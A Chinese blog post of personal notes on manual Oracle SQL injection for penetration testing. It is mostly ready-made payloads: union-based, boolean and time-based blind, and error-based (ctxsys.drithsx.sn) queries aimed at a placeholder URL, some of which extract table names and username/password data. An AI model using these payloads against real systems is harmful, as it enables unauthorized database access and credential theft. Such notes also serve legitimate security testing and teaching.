oracle数据库注入

前言

过去渗透遇到oracle注入都是使用工具去跑的,这几天看到相关的文章就想起自己对oracle数据库手工注入的知识点还有所欠缺,本文做次简单的笔记整理

角色

1
2
3
connect --连接角色,基本角色
resource --开发者角色
dba --超级管理员角色

注入时常用命令

1
2
3
4
5
6
7
8
9
10
11
12
查询用户名
select user from dual;
获取当前数据库名
select * from global_name;
查询版本信息
select banner from v$version;
获取当前用户权限
select * from session_privs;
获取当前用户所拥有权限下的所有数据库
select distinct owner,table_name from all_tables;
获取指定表的字段(注意这里的table_name全部大写)
select column_name from all_tab_columns where table_name='USERS';

注入时常用的函数和拼接符

dual 是Oracle中的虚表,任何用户均可读取,常用在没有目标表的select 语句中

1
2
3
4
5
6
7
8
9
10
11
12
13
字符串拼接
select '123'||'456' from dual;
分页(等效limit
select * from users where rownum=1;
select * from users where rownum<2;
select * from users where rownum<=1;
注释符
--
-- -
--空格
/**/
实现mysql的group_concat(以波浪号为分隔符连接多个column_name
select listagg(column_name,'~') within group (order by column_name) from user_tab_columns;

联合查询

1
2
3
4
5
6
7
8
9
10
11
格式
select * from users where id=2 union select null,null,null from dual;

获取表名
select * from users where id=2 union select null,null,(select listagg(table_name,'~') within group(order by 1) from all_tables where owner='SQLI') from dual;

获取指定表的字段名
select * from users where id=2 union select null,null,(select listagg(column_name,':') within group(order by 1) from all_tab_columns where table_name='USERS') from dual;

获取指定字段内容
select * from users where id=2 union select null,null,(select listagg(uname||'&'||pwd,':') within group(order by 1) from users where rownum=1) from dual;

盲注

1
2
3
4
5
6
select * from users where id=1 and 1=(select decode(user,'SQLI',1) from dual);
select * from users where id=1 and 'S'=(select substr(user,1,1)from dual);

延时
select dbms_pipe.receive_message('aaa',3) from dual;
select dbms_pipe.receive_message('aaa',(decode((select user from dual),'SQLI',3))) from dual;

联合查询注入通用流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
判断注入点是否存在
http://xxx/x.php?id=1'
http://xxx/x.php?id=1' --+
http://xxx/x.php?id=1 and 1=1
http://xxx/x.php?id=1 and 1=2
判断字段数量
http://xxx/x.php?id=1 order by 1
http://xxx/x.php?id=1 order by 2
...
http://xxx/x.php?id=1 order by n
显示出错字段处
http://xxx/x.php?id=1 and 1=2 union select null,null,null,null
替换每个null为类型如'1',2之类判断类型和回显位置

然后在可回显位置放置查询语句

判断用户名
http://xxx/x.php?id=1 and 1=2 union select null,user,null,null
判断数据库版本
http://xxx/x.php?id=1 and 1=2 union select null,(select banner from v$version),null,null from all_users
判断用户权限
http://xxx/x.php?id=1 and 1=2 union select null,(select privilege from session_privs where rownum=1),null,null
获取当前数据库
http://xxx/x.php?id=1 and 1=2 union select null,global_name,null,null from global_name
http://xxx/x.php?id=1 and 1=2 union select null,(select global_name from global_name),null,null
获取表名
http://xxx/x.php?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1),null,null from dual
获取字段名
http://xxx/x.php?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='USERS' and rownum=1),null,null from dual
获取数据
http://xxx/x.php?id=1 and 1=2 union select null,(select name from USERS where rownum=1),null,null from dual

报错注入通用流程

1
2
3
4
5
6
7
8
9
10
获取用户名
id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --
获取当前用户权限数据表
id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1)) --
查询列名
id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='USERS' and rownum=1)) --
查询数据
id=1 and 1=ctxsys.drithsx.sn(1,(select username password from USERS where rownum=1)) --

同理还有多种报错函数可以查询

参考文档

https://www.chabug.org/web/1827.html

https://www.jianshu.com/p/5ce219032823

sql注入
oracle

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!